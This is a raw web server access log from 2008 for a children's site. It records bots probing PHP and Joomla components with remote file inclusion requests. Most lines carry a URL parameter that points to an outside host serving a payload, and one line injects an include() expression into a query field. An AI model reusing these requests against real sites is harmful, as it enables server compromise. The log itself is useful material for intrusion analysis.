87.106.245.44 - - [20/Nov/2008:00:57:05 -0700] "GET /logs/error_log.old%20%20/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:00:57:05 -0700] "GET /appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:00:57:15 -0700] "GET /logs/access_log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:00:57:16 -0700] "GET /logs/access_log.old//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:58:11 -0700] "GET /logs/access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:58:13 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:58:14 -0700] "GET /logs/access_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
212.34.174.106 - - [20/Nov/2008:00:58:14 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
222.233.52.18 - - [20/Nov/2008:00:59:31 -0700] "GET /logs/access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
208.69.192.200 - - [20/Nov/2008:01:00:44 -0700] "GET //errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
208.69.192.200 - - [20/Nov/2008:01:00:44 -0700] "GET /logs//errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
69.73.138.108 - - [20/Nov/2008:01:01:19 -0700] "GET //errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [20/Nov/2008:01:01:19 -0700] "GET /logs//errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [20/Nov/2008:01:01:37 -0700] "GET //errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [20/Nov/2008:01:01:37 -0700] "GET /logs//errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
203.231.35.38 - - [20/Nov/2008:01:02:13 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:01:02:13 -0700] "GET /logs/access_log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:01:02:14 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:01:02:17 -0700] "GET /logs/error_log.old//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:01:04:15 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:04:15 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:04:15 -0700] "GET /logs/access_log.old%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [20/Nov/2008:01:07:00 -0700] "GET /logs/access_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [20/Nov/2008:01:07:00 -0700] "GET /logs/access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
69.73.133.74 - - [20/Nov/2008:01:07:26 -0700] "GET /logs/access_log.old//skin/zero_vote/ask_password.php?dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
69.73.133.74 - - [20/Nov/2008:01:07:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
69.73.133.74 - - [20/Nov/2008:01:07:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
94.23.10.29 - - [20/Nov/2008:01:07:46 -0700] "GET /logs/error_log.old%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:01:07:47 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:01:07:48 -0700] "GET /logs/access_log.old%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:01:07:48 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
69.73.133.74 - - [20/Nov/2008:01:07:54 -0700] "GET /logs/access_log//skin/zero_vote/ask_password.php?dir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "-"
87.106.245.44 - - [20/Nov/2008:01:08:42 -0700] "GET /logs/error_log.old/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:01:10:07 -0700] "GET /logs/error_log.old/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:10:15 -0700] "GET /logs/access_log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:01:10:19 -0700] "GET /logs/access_log/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:01:10:46 -0700] "GET /logs/error_log.old/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:01:11:02 -0700] "GET /logs/error_log.old%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [20/Nov/2008:01:11:10 -0700] "GET /logs/access_log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [20/Nov/2008:01:11:10 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [20/Nov/2008:01:11:10 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:11:18 -0700] "GET /logs/error_log.old/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:11:27 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:01:11:27 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:01:11:27 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
66.249.71.27 - - [20/Nov/2008:01:11:37 -0700] "GET /robots.txt HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.71.26 - - [20/Nov/2008:01:11:37 -0700] "GET /oldcalendars/_vti_cnf/calendarmay06.htm HTTP/1.1" 200 9730 www.wnckids.com "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
87.106.245.44 - - [20/Nov/2008:01:11:43 -0700] "GET /logs/access_log/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
87.106.245.44 - - [20/Nov/2008:01:12:20 -0700] "GET /logs/access_log/appserv/main.php?appserv_root=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:12:38 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:01:13:33 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:01:13:33 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:01:13:35 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
203.231.35.38 - - [20/Nov/2008:01:15:29 -0700] "GET /logs/access_log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
206.225.91.21 - - [20/Nov/2008:01:15:32 -0700] "GET /logs/access_log.old/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:01:16:03 -0700] "GET /logs/error_log.old/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:01:16:14 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rostrum56.ingeraldton.com/mutcp/tcp/idprv8.txt????? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.23.10.29 - - [20/Nov/2008:01:18:06 -0700] "GET /logs/access_log.old/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
72.30.79.91 - - [20/Nov/2008:01:19:07 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
64.254.233.2 - - [20/Nov/2008:01:19:08 -0700] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
72.30.79.91 - - [20/Nov/2008:01:19:11 -0700] "GET /images/animalsinsects/_vti_cnf/?M=A HTTP/1.0" 200 656 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
206.225.91.21 - - [20/Nov/2008:01:24:11 -0700] "GET /logs/access_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.233.52.18 - - [20/Nov/2008:01:27:21 -0700] "GET /logs/error_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
212.34.174.106 - - [20/Nov/2008:01:29:30 -0700] "GET /logs/access_log.old%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
69.73.189.182 - - [20/Nov/2008:01:33:15 -0700] "GET //export_batch.inc.php?DIR=http://soenkejohannsen.de/php//gb/avatar/image??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
69.73.189.182 - - [20/Nov/2008:01:33:15 -0700] "GET /logs/access_log.old//export_batch.inc.php?DIR=http://soenkejohannsen.de/php//gb/avatar/image??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
69.73.189.182 - - [20/Nov/2008:01:33:15 -0700] "GET /logs//export_batch.inc.php?DIR=http://soenkejohannsen.de/php//gb/avatar/image??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
219.85.63.226 - - [20/Nov/2008:01:33:50 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "-"
219.85.63.226 - - [20/Nov/2008:01:33:50 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "-"
72.30.87.82 - - [20/Nov/2008:01:34:07 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.87.82 - - [20/Nov/2008:01:34:07 -0700] "GET /oldcalendars/calendaroct05.htm HTTP/1.0" 304 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.87.82 - - [20/Nov/2008:01:36:13 -0700] "GET /wwwstat/ HTTP/1.0" 200 5407 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
64.254.233.2 - - [20/Nov/2008:01:41:36 -0700] "GET /logs/access_log.old/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [20/Nov/2008:01:41:36 -0700] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [20/Nov/2008:01:41:36 -0700] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
8.7.26.27 - - [20/Nov/2008:01:43:48 -0700] "GET //export_batch.inc.php?DIR=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
8.7.26.27 - - [20/Nov/2008:01:43:49 -0700] "GET /logs//export_batch.inc.php?DIR=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
8.7.26.27 - - [20/Nov/2008:01:43:49 -0700] "GET /logs/access_log//export_batch.inc.php?DIR=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
8.7.26.27 - - [20/Nov/2008:01:43:52 -0700] "GET /logs/access_log.old//export_batch.inc.php?DIR=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
94.23.10.29 - - [20/Nov/2008:01:50:02 -0700] "GET /logs/access_log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:50:02 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:50:02 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:01:50:06 -0700] "GET /logs/access_log.old%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
82.146.59.116 - - [20/Nov/2008:01:50:46 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=http://209.250.239.6/images/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.820" "-"
82.146.59.116 - - [20/Nov/2008:01:50:47 -0700] "GET //administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=http://209.250.239.6/images/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.820" "-"
82.146.59.116 - - [20/Nov/2008:01:50:50 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=http://209.250.239.6/images/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.820" "-"
82.146.59.116 - - [20/Nov/2008:01:50:50 -0700] "GET //administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=http://209.250.239.6/images/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.820" "-"
195.137.143.11 - - [20/Nov/2008:01:55:16 -0700] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [20/Nov/2008:01:55:17 -0700] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
138.4.5.9 - - [20/Nov/2008:01:56:24 -0700] "GET /logs/access_log.old//?_zb_path=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
138.4.5.9 - - [20/Nov/2008:01:56:24 -0700] "GET /logs//?_zb_path=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 200 971 www.wnckids.com "-" "Mozilla/5.0" "-"
138.4.5.9 - - [20/Nov/2008:01:56:24 -0700] "GET //?_zb_path=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 200 1047 www.wnckids.com "-" "Mozilla/5.0" "-"
138.4.5.9 - - [20/Nov/2008:01:56:24 -0700] "GET /logs/access_log//?_zb_path=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
117.103.14.5 - - [20/Nov/2008:01:57:41 -0700] "GET /logs/access_log.old/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.deporte6am.com/imager/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
117.103.14.5 - - [20/Nov/2008:01:57:41 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.deporte6am.com/imager/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
117.103.14.5 - - [20/Nov/2008:01:57:41 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.deporte6am.com/imager/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
82.146.59.116 - - [20/Nov/2008:01:58:07 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://209.250.239.6/images/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.820" "-"
82.146.59.116 - - [20/Nov/2008:01:58:07 -0700] "GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://209.250.239.6/images/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.820" "-"
82.146.59.116 - - [20/Nov/2008:01:58:12 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://209.250.239.6/images/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.820" "-"
82.146.59.116 - - [20/Nov/2008:01:58:13 -0700] "GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://209.250.239.6/images/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.820" "-"
203.231.35.38 - - [20/Nov/2008:02:00:12 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:02:00:12 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:02:00:12 -0700] "GET /logs/access_log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.116.63.71 - - [20/Nov/2008:02:01:01 -0700] "GET /?custompluginfile[]=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 200 1047 www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "-"
203.116.63.71 - - [20/Nov/2008:02:01:01 -0700] "GET /logs/?custompluginfile[]=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 200 966 www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "-"
94.23.10.29 - - [20/Nov/2008:02:05:13 -0700] "GET /logs/access_log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
94.23.10.29 - - [20/Nov/2008:02:05:26 -0700] "GET /logs/access_log.old//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
